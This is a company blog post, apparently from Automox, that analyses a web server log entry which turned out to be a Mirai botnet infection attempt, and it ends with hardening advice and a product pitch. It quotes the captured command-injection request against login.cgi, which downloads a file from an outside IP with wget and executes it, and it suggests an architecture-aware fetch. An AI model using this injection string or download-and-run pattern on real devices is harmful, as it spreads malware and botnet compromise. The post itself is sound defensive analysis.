If you have run a web server of any kind, then you have likely seen some odd log entries. Those entries could be attributed to a crawler, typo or an attack. This week at Automox, we saw a very interesting entry in our logs. This entry was so intriguing that it immediately grabbed the attention of our Director of Infrastructure, CTO, and CISO. After some excited conversations back and forth via Slack, we got the payload and we determined it was…
The Attack
In our web server logs we saw the attacker was trying to run a number of commands in a row exploiting a weakness in an authentication page that allowed users to run arbitrary commands on the web server.
/login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1"
|
Worth noting here is that we do not have anything with mod_cgi running in our infrastructure. This means this type of attack would have never worked, and would have returned a 404 to the attacker. The attacker was trying to run a wget to download a payload, and execute it. Obviously, you do not want to download that payload in to your host. So, the first step was to spin up a VM and get down to business.
By looking at the URL below, you’ll see that it downloads a file, chmods it, and runs it:
wget http://80.211.67.245/k -O /tmp/ks
|
Using wget in our VM, we downloaded the file:
The Payload: Part 1
The first part of the payload is a script. The script contacts the server again, and downloads an attack for each architecture it may be running on:
Well, well...this is just sloppy coding! Why not run `uname -m` and do a wget http://badsite/`uname -m`?
Using wget we get the payload.
The Payload: Part 2
Now that the file is on the server, the script executes it and launches the malware. Obviously, we did not want to run that. So, what was the attack? To determine, we created a hash and passed it to VirusTotal:
The results told us that it was Mirai:
Interestingly enough, in the twenty hours that have passed between when I first saw the log entry and did this write up, it has been detected 7 more times. Therefore, it must be a new variant:
Conclusion
This was a Mirai attack. This type of attack would only work on devices with a web application using CGI and it would allow commands to be run by an non-authenticated user. Mirai has been out for nearly two years now and we are still seeing new variants being released. This just reinforces the need to be vigilant about overall security hygiene. Certainly do not run your web application as root, make sure to patch your OS, and frequently change passwords to protect your infrastructure. As in the case of Mirai, do not expose your configuration web page to the public internet.
Automox for Easy IT Operations
Automox is the cloud-native IT operations platform for modern organizations. It makes it easy to keep every endpoint automatically configured, patched, and secured – anywhere in the world. With the push of a button, IT admins can fix critical vulnerabilities faster, slash cost and complexity, and win back hours in their day.
Grab your free trial of Automox and join thousands of companies transforming IT operations into a strategic business driver.